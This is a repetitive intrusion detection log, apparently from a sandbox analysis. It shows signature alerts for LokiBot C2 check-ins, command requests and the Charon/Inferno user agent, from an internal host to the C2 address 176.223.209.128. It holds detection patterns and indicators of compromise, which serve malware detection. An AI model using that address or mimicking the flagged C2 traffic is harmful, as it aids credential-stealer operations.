                                              11/25/21-10:48:15.068809TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.11.20176.223.209.128
                                              11/25/21-10:48:15.068809TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.11.20176.223.209.128
                                              11/25/21-10:48:15.068809TCP2025381ET TROJAN LokiBot Checkin4985680192.168.11.20176.223.209.128
                                              11/25/21-10:48:15.068809TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985680192.168.11.20176.223.209.128
                                              11/25/21-10:48:15.740662TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.11.20176.223.209.128
                                              11/25/21-10:48:15.740662TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.11.20176.223.209.128
                                              11/25/21-10:48:15.740662TCP2025381ET TROJAN LokiBot Checkin4985780192.168.11.20176.223.209.128
                                              11/25/21-10:48:15.740662TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985780192.168.11.20176.223.209.128
                                              11/25/21-10:48:16.437510TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.11.20176.223.209.128
                                              11/25/21-10:48:16.437510TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.11.20176.223.209.128
                                              11/25/21-10:48:16.437510TCP2025381ET TROJAN LokiBot Checkin4985880192.168.11.20176.223.209.128
                                              11/25/21-10:48:16.437510TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985880192.168.11.20176.223.209.128
                                              11/25/21-10:48:17.100652TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.11.20176.223.209.128
                                              11/25/21-10:48:17.100652TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.11.20176.223.209.128
                                              11/25/21-10:48:17.100652TCP2025381ET TROJAN LokiBot Checkin4985980192.168.11.20176.223.209.128
                                              11/25/21-10:48:17.100652TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985980192.168.11.20176.223.209.128
                                              11/25/21-10:48:17.734632TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.11.20176.223.209.128
                                              11/25/21-10:48:17.734632TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.11.20176.223.209.128
                                              11/25/21-10:48:17.734632TCP2025381ET TROJAN LokiBot Checkin4986080192.168.11.20176.223.209.128
                                              11/25/21-10:48:17.734632TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986080192.168.11.20176.223.209.128
                                              11/25/21-10:48:18.417274TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986180192.168.11.20176.223.209.128
                                              11/25/21-10:48:18.417274TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986180192.168.11.20176.223.209.128
                                              11/25/21-10:48:18.417274TCP2025381ET TROJAN LokiBot Checkin4986180192.168.11.20176.223.209.128
                                              11/25/21-10:48:18.417274TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986180192.168.11.20176.223.209.128
                                              11/25/21-10:48:19.071832TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986280192.168.11.20176.223.209.128
                                              11/25/21-10:48:19.071832TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986280192.168.11.20176.223.209.128
                                              11/25/21-10:48:19.071832TCP2025381ET TROJAN LokiBot Checkin4986280192.168.11.20176.223.209.128
                                              11/25/21-10:48:19.071832TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986280192.168.11.20176.223.209.128
                                              11/25/21-10:48:19.719301TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986380192.168.11.20176.223.209.128
                                              11/25/21-10:48:19.719301TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986380192.168.11.20176.223.209.128
                                              11/25/21-10:48:19.719301TCP2025381ET TROJAN LokiBot Checkin4986380192.168.11.20176.223.209.128
                                              11/25/21-10:48:19.719301TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986380192.168.11.20176.223.209.128
                                              11/25/21-10:48:20.354985TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.11.20176.223.209.128
                                              11/25/21-10:48:20.354985TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.11.20176.223.209.128
                                              11/25/21-10:48:20.354985TCP2025381ET TROJAN LokiBot Checkin4986480192.168.11.20176.223.209.128
                                              11/25/21-10:48:20.354985TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986480192.168.11.20176.223.209.128
                                              11/25/21-10:48:21.038148TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986580192.168.11.20176.223.209.128
                                              11/25/21-10:48:21.038148TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986580192.168.11.20176.223.209.128
                                              11/25/21-10:48:21.038148TCP2025381ET TROJAN LokiBot Checkin4986580192.168.11.20176.223.209.128
                                              11/25/21-10:48:21.038148TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986580192.168.11.20176.223.209.128
                                              11/25/21-10:48:21.765352TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986680192.168.11.20176.223.209.128
                                              11/25/21-10:48:21.765352TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986680192.168.11.20176.223.209.128
                                              11/25/21-10:48:21.765352TCP2025381ET TROJAN LokiBot Checkin4986680192.168.11.20176.223.209.128
                                              11/25/21-10:48:21.765352TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986680192.168.11.20176.223.209.128
                                              11/25/21-10:48:22.464834TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986780192.168.11.20176.223.209.128
                                              11/25/21-10:48:22.464834TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986780192.168.11.20176.223.209.128
                                              11/25/21-10:48:22.464834TCP2025381ET TROJAN LokiBot Checkin4986780192.168.11.20176.223.209.128
                                              11/25/21-10:48:22.464834TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986780192.168.11.20176.223.209.128
                                              11/25/21-10:48:23.130212TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986980192.168.11.20176.223.209.128
                                              11/25/21-10:48:23.130212TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986980192.168.11.20176.223.209.128
                                              11/25/21-10:48:23.130212TCP2025381ET TROJAN LokiBot Checkin4986980192.168.11.20176.223.209.128
                                              11/25/21-10:48:23.130212TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986980192.168.11.20176.223.209.128
                                              11/25/21-10:48:23.726846TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987080192.168.11.20176.223.209.128
                                              11/25/21-10:48:23.726846TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987080192.168.11.20176.223.209.128
                                              11/25/21-10:48:23.726846TCP2025381ET TROJAN LokiBot Checkin4987080192.168.11.20176.223.209.128
                                              11/25/21-10:48:23.726846TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987080192.168.11.20176.223.209.128
                                              11/25/21-10:48:24.413483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987180192.168.11.20176.223.209.128
                                              11/25/21-10:48:24.413483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987180192.168.11.20176.223.209.128
                                              11/25/21-10:48:24.413483TCP2025381ET TROJAN LokiBot Checkin4987180192.168.11.20176.223.209.128
                                              11/25/21-10:48:24.413483TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987180192.168.11.20176.223.209.128
                                              11/25/21-10:48:25.080255TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987280192.168.11.20176.223.209.128
                                              11/25/21-10:48:25.080255TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987280192.168.11.20176.223.209.128
                                              11/25/21-10:48:25.080255TCP2025381ET TROJAN LokiBot Checkin4987280192.168.11.20176.223.209.128
                                              11/25/21-10:48:25.080255TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987280192.168.11.20176.223.209.128
                                              11/25/21-10:48:25.780948TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987380192.168.11.20176.223.209.128
                                              11/25/21-10:48:25.780948TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987380192.168.11.20176.223.209.128
                                              11/25/21-10:48:25.780948TCP2025381ET TROJAN LokiBot Checkin4987380192.168.11.20176.223.209.128
                                              11/25/21-10:48:25.780948TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987380192.168.11.20176.223.209.128
                                              11/25/21-10:48:26.412910TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987480192.168.11.20176.223.209.128
                                              11/25/21-10:48:26.412910TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987480192.168.11.20176.223.209.128
                                              11/25/21-10:48:26.412910TCP2025381ET TROJAN LokiBot Checkin4987480192.168.11.20176.223.209.128
                                              11/25/21-10:48:26.412910TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987480192.168.11.20176.223.209.128
                                              11/25/21-10:48:27.083164TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987580192.168.11.20176.223.209.128
                                              11/25/21-10:48:27.083164TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987580192.168.11.20176.223.209.128
                                              11/25/21-10:48:27.083164TCP2025381ET TROJAN LokiBot Checkin4987580192.168.11.20176.223.209.128
                                              11/25/21-10:48:27.083164TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987580192.168.11.20176.223.209.128
                                              11/25/21-10:48:27.693462TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987680192.168.11.20176.223.209.128
                                              11/25/21-10:48:27.693462TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987680192.168.11.20176.223.209.128
                                              11/25/21-10:48:27.693462TCP2025381ET TROJAN LokiBot Checkin4987680192.168.11.20176.223.209.128
                                              11/25/21-10:48:27.693462TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987680192.168.11.20176.223.209.128
                                              11/25/21-10:48:28.273851TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987780192.168.11.20176.223.209.128
                                              11/25/21-10:48:28.273851TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987780192.168.11.20176.223.209.128
                                              11/25/21-10:48:28.273851TCP2025381ET TROJAN LokiBot Checkin4987780192.168.11.20176.223.209.128
                                              11/25/21-10:48:28.273851TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987780192.168.11.20176.223.209.128
                                              11/25/21-10:48:28.858505TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987880192.168.11.20176.223.209.128
                                              11/25/21-10:48:28.858505TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987880192.168.11.20176.223.209.128
                                              11/25/21-10:48:28.858505TCP2025381ET TROJAN LokiBot Checkin4987880192.168.11.20176.223.209.128
                                              11/25/21-10:48:28.858505TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987880192.168.11.20176.223.209.128
                                              11/25/21-10:48:29.436238TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987980192.168.11.20176.223.209.128
                                              11/25/21-10:48:29.436238TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987980192.168.11.20176.223.209.128
                                              11/25/21-10:48:29.436238TCP2025381ET TROJAN LokiBot Checkin4987980192.168.11.20176.223.209.128
                                              11/25/21-10:48:29.436238TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987980192.168.11.20176.223.209.128
                                              11/25/21-10:48:29.956863TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988080192.168.11.20176.223.209.128
                                              11/25/21-10:48:29.956863TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988080192.168.11.20176.223.209.128
                                              11/25/21-10:48:29.956863TCP2025381ET TROJAN LokiBot Checkin4988080192.168.11.20176.223.209.128
                                              11/25/21-10:48:29.956863TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988080192.168.11.20176.223.209.128
                                              11/25/21-10:48:30.618581TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988180192.168.11.20176.223.209.128
                                              11/25/21-10:48:30.618581TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988180192.168.11.20176.223.209.128
                                              11/25/21-10:48:30.618581TCP2025381ET TROJAN LokiBot Checkin4988180192.168.11.20176.223.209.128
                                              11/25/21-10:48:30.618581TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988180192.168.11.20176.223.209.128
                                              11/25/21-10:48:31.231230TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.11.20176.223.209.128
                                              11/25/21-10:48:31.231230TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.11.20176.223.209.128
                                              11/25/21-10:48:31.231230TCP2025381ET TROJAN LokiBot Checkin4988280192.168.11.20176.223.209.128
                                              11/25/21-10:48:31.231230TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.11.20176.223.209.128
                                              11/25/21-10:48:31.831960TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.11.20176.223.209.128
                                              11/25/21-10:48:31.831960TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.11.20176.223.209.128
                                              11/25/21-10:48:31.831960TCP2025381ET TROJAN LokiBot Checkin4988380192.168.11.20176.223.209.128
                                              11/25/21-10:48:31.831960TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.11.20176.223.209.128
                                              11/25/21-10:48:32.435657TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988480192.168.11.20176.223.209.128
                                              11/25/21-10:48:32.435657TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988480192.168.11.20176.223.209.128
                                              11/25/21-10:48:32.435657TCP2025381ET TROJAN LokiBot Checkin4988480192.168.11.20176.223.209.128
                                              11/25/21-10:48:32.435657TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988480192.168.11.20176.223.209.128
                                              11/25/21-10:48:33.088495TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.11.20176.223.209.128
                                              11/25/21-10:48:33.088495TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.11.20176.223.209.128
                                              11/25/21-10:48:33.088495TCP2025381ET TROJAN LokiBot Checkin4988580192.168.11.20176.223.209.128
                                              11/25/21-10:48:33.088495TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.11.20176.223.209.128
                                              11/25/21-10:48:33.745000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988680192.168.11.20176.223.209.128
                                              11/25/21-10:48:33.745000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988680192.168.11.20176.223.209.128
                                              11/25/21-10:48:33.745000TCP2025381ET TROJAN LokiBot Checkin4988680192.168.11.20176.223.209.128
                                              11/25/21-10:48:33.745000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988680192.168.11.20176.223.209.128
                                              11/25/21-10:48:34.343229TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988780192.168.11.20176.223.209.128
                                              11/25/21-10:48:34.343229TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988780192.168.11.20176.223.209.128
                                              11/25/21-10:48:34.343229TCP2025381ET TROJAN LokiBot Checkin4988780192.168.11.20176.223.209.128
                                              11/25/21-10:48:34.343229TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988780192.168.11.20176.223.209.128
                                              11/25/21-10:48:34.941843TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988880192.168.11.20176.223.209.128
                                              11/25/21-10:48:34.941843TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988880192.168.11.20176.223.209.128
                                              11/25/21-10:48:34.941843TCP2025381ET TROJAN LokiBot Checkin4988880192.168.11.20176.223.209.128
                                              11/25/21-10:48:34.941843TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988880192.168.11.20176.223.209.128
                                              11/25/21-10:48:35.542265TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988980192.168.11.20176.223.209.128
                                              11/25/21-10:48:35.542265TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988980192.168.11.20176.223.209.128
                                              11/25/21-10:48:35.542265TCP2025381ET TROJAN LokiBot Checkin4988980192.168.11.20176.223.209.128
                                              11/25/21-10:48:35.542265TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988980192.168.11.20176.223.209.128
                                              11/25/21-10:48:36.204634TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.11.20176.223.209.128
                                              11/25/21-10:48:36.204634TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.11.20176.223.209.128
                                              11/25/21-10:48:36.204634TCP2025381ET TROJAN LokiBot Checkin4989080192.168.11.20176.223.209.128
                                              11/25/21-10:48:36.204634TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.11.20176.223.209.128
                                              11/25/21-10:48:36.820808TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989180192.168.11.20176.223.209.128
                                              11/25/21-10:48:36.820808TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989180192.168.11.20176.223.209.128
                                              11/25/21-10:48:36.820808TCP2025381ET TROJAN LokiBot Checkin4989180192.168.11.20176.223.209.128
                                              11/25/21-10:48:36.820808TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989180192.168.11.20176.223.209.128
                                              11/25/21-10:48:37.469781TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.11.20176.223.209.128
                                              11/25/21-10:48:37.469781TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.11.20176.223.209.128
                                              11/25/21-10:48:37.469781TCP2025381ET TROJAN LokiBot Checkin4989280192.168.11.20176.223.209.128
                                              11/25/21-10:48:37.469781TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.11.20176.223.209.128
                                              11/25/21-10:48:38.005113TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989380192.168.11.20176.223.209.128
                                              11/25/21-10:48:38.005113TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989380192.168.11.20176.223.209.128
                                              11/25/21-10:48:38.005113TCP2025381ET TROJAN LokiBot Checkin4989380192.168.11.20176.223.209.128
                                              11/25/21-10:48:38.005113TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989380192.168.11.20176.223.209.128
                                              11/25/21-10:48:38.572495TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989480192.168.11.20176.223.209.128
                                              11/25/21-10:48:38.572495TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989480192.168.11.20176.223.209.128
                                              11/25/21-10:48:38.572495TCP2025381ET TROJAN LokiBot Checkin4989480192.168.11.20176.223.209.128
                                              11/25/21-10:48:38.572495TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989480192.168.11.20176.223.209.128
                                              11/25/21-10:48:39.175559TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989580192.168.11.20176.223.209.128
                                              11/25/21-10:48:39.175559TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989580192.168.11.20176.223.209.128
                                              11/25/21-10:48:39.175559TCP2025381ET TROJAN LokiBot Checkin4989580192.168.11.20176.223.209.128
                                              11/25/21-10:48:39.175559TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989580192.168.11.20176.223.209.128
                                              11/25/21-10:48:39.761326TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989680192.168.11.20176.223.209.128
                                              11/25/21-10:48:39.761326TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989680192.168.11.20176.223.209.128
                                              11/25/21-10:48:39.761326TCP2025381ET TROJAN LokiBot Checkin4989680192.168.11.20176.223.209.128
                                              11/25/21-10:48:39.761326TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989680192.168.11.20176.223.209.128
                                              11/25/21-10:48:40.218861TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989780192.168.11.20176.223.209.128
                                              11/25/21-10:48:40.218861TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989780192.168.11.20176.223.209.128
                                              11/25/21-10:48:40.218861TCP2025381ET TROJAN LokiBot Checkin4989780192.168.11.20176.223.209.128
                                              11/25/21-10:48:40.218861TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989780192.168.11.20176.223.209.128
                                              11/25/21-10:48:40.780536TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989880192.168.11.20176.223.209.128
                                              11/25/21-10:48:40.780536TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989880192.168.11.20176.223.209.128
                                              11/25/21-10:48:40.780536TCP2025381ET TROJAN LokiBot Checkin4989880192.168.11.20176.223.209.128
                                              11/25/21-10:48:40.780536TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989880192.168.11.20176.223.209.128
                                              11/25/21-10:48:41.373512TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989980192.168.11.20176.223.209.128
                                              11/25/21-10:48:41.373512TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989980192.168.11.20176.223.209.128
                                              11/25/21-10:48:41.373512TCP2025381ET TROJAN LokiBot Checkin4989980192.168.11.20176.223.209.128
                                              11/25/21-10:48:41.373512TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989980192.168.11.20176.223.209.128
                                              11/25/21-10:48:41.968153TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990080192.168.11.20176.223.209.128
                                              11/25/21-10:48:41.968153TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990080192.168.11.20176.223.209.128
                                              11/25/21-10:48:41.968153TCP2025381ET TROJAN LokiBot Checkin4990080192.168.11.20176.223.209.128
                                              11/25/21-10:48:41.968153TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990080192.168.11.20176.223.209.128
                                              11/25/21-10:48:42.536148TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990180192.168.11.20176.223.209.128
                                              11/25/21-10:48:42.536148TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990180192.168.11.20176.223.209.128
                                              11/25/21-10:48:42.536148TCP2025381ET TROJAN LokiBot Checkin4990180192.168.11.20176.223.209.128
                                              11/25/21-10:48:42.536148TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990180192.168.11.20176.223.209.128
                                              11/25/21-10:48:43.112376TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990280192.168.11.20176.223.209.128
                                              11/25/21-10:48:43.112376TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990280192.168.11.20176.223.209.128
                                              11/25/21-10:48:43.112376TCP2025381ET TROJAN LokiBot Checkin4990280192.168.11.20176.223.209.128
                                              11/25/21-10:48:43.112376TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990280192.168.11.20176.223.209.128
                                              11/25/21-10:48:43.645826TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990380192.168.11.20176.223.209.128
                                              11/25/21-10:48:43.645826TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990380192.168.11.20176.223.209.128
                                              11/25/21-10:48:43.645826TCP2025381ET TROJAN LokiBot Checkin4990380192.168.11.20176.223.209.128
                                              11/25/21-10:48:43.645826TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990380192.168.11.20176.223.209.128
                                              11/25/21-10:48:44.201691TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990480192.168.11.20176.223.209.128
                                              11/25/21-10:48:44.201691TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990480192.168.11.20176.223.209.128
                                              11/25/21-10:48:44.201691TCP2025381ET TROJAN LokiBot Checkin4990480192.168.11.20176.223.209.128
                                              11/25/21-10:48:44.201691TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990480192.168.11.20176.223.209.128
                                              11/25/21-10:48:44.811529TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990580192.168.11.20176.223.209.128
                                              11/25/21-10:48:44.811529TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990580192.168.11.20176.223.209.128
                                              11/25/21-10:48:44.811529TCP2025381ET TROJAN LokiBot Checkin4990580192.168.11.20176.223.209.128
                                              11/25/21-10:48:44.811529TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990580192.168.11.20176.223.209.128
                                              11/25/21-10:48:45.392079TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990680192.168.11.20176.223.209.128
                                              11/25/21-10:48:45.392079TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990680192.168.11.20176.223.209.128
                                              11/25/21-10:48:45.392079TCP2025381ET TROJAN LokiBot Checkin4990680192.168.11.20176.223.209.128
                                              11/25/21-10:48:45.392079TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990680192.168.11.20176.223.209.128
                                              11/25/21-10:48:45.989299TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990780192.168.11.20176.223.209.128
                                              11/25/21-10:48:45.989299TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990780192.168.11.20176.223.209.128
                                              11/25/21-10:48:45.989299TCP2025381ET TROJAN LokiBot Checkin4990780192.168.11.20176.223.209.128
                                              11/25/21-10:48:45.989299TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990780192.168.11.20176.223.209.128
                                              11/25/21-10:48:46.527621TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990880192.168.11.20176.223.209.128
                                              11/25/21-10:48:46.527621TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990880192.168.11.20176.223.209.128
                                              11/25/21-10:48:46.527621TCP2025381ET TROJAN LokiBot Checkin4990880192.168.11.20176.223.209.128
                                              11/25/21-10:48:46.527621TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990880192.168.11.20176.223.209.128
                                              11/25/21-10:48:47.107853TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990980192.168.11.20176.223.209.128
                                              11/25/21-10:48:47.107853TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990980192.168.11.20176.223.209.128
                                              11/25/21-10:48:47.107853TCP2025381ET TROJAN LokiBot Checkin4990980192.168.11.20176.223.209.128
                                              11/25/21-10:48:47.107853TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990980192.168.11.20176.223.209.128
                                              11/25/21-10:48:47.685832TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991180192.168.11.20176.223.209.128
                                              11/25/21-10:48:47.685832TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991180192.168.11.20176.223.209.128
                                              11/25/21-10:48:47.685832TCP2025381ET TROJAN LokiBot Checkin4991180192.168.11.20176.223.209.128
                                              11/25/21-10:48:47.685832TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991180192.168.11.20176.223.209.128
                                              11/25/21-10:48:48.224670TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991280192.168.11.20176.223.209.128
                                              11/25/21-10:48:48.224670TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991280192.168.11.20176.223.209.128
                                              11/25/21-10:48:48.224670TCP2025381ET TROJAN LokiBot Checkin4991280192.168.11.20176.223.209.128
                                              11/25/21-10:48:48.224670TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991280192.168.11.20176.223.209.128
                                              11/25/21-10:48:48.828094TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991380192.168.11.20176.223.209.128
                                              11/25/21-10:48:48.828094TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991380192.168.11.20176.223.209.128
                                              11/25/21-10:48:48.828094TCP2025381ET TROJAN LokiBot Checkin4991380192.168.11.20176.223.209.128
                                              11/25/21-10:48:48.828094TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991380192.168.11.20176.223.209.128
                                              11/25/21-10:48:49.359585TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991480192.168.11.20176.223.209.128
                                              11/25/21-10:48:49.359585TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991480192.168.11.20176.223.209.128
                                              11/25/21-10:48:49.359585TCP2025381ET TROJAN LokiBot Checkin4991480192.168.11.20176.223.209.128
                                              11/25/21-10:48:49.359585TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991480192.168.11.20176.223.209.128
                                              11/25/21-10:48:49.936381TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991580192.168.11.20176.223.209.128
                                              11/25/21-10:48:49.936381TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991580192.168.11.20176.223.209.128
                                              11/25/21-10:48:49.936381TCP2025381ET TROJAN LokiBot Checkin4991580192.168.11.20176.223.209.128
                                              11/25/21-10:48:49.936381TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991580192.168.11.20176.223.209.128
                                              11/25/21-10:48:50.496916TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991680192.168.11.20176.223.209.128
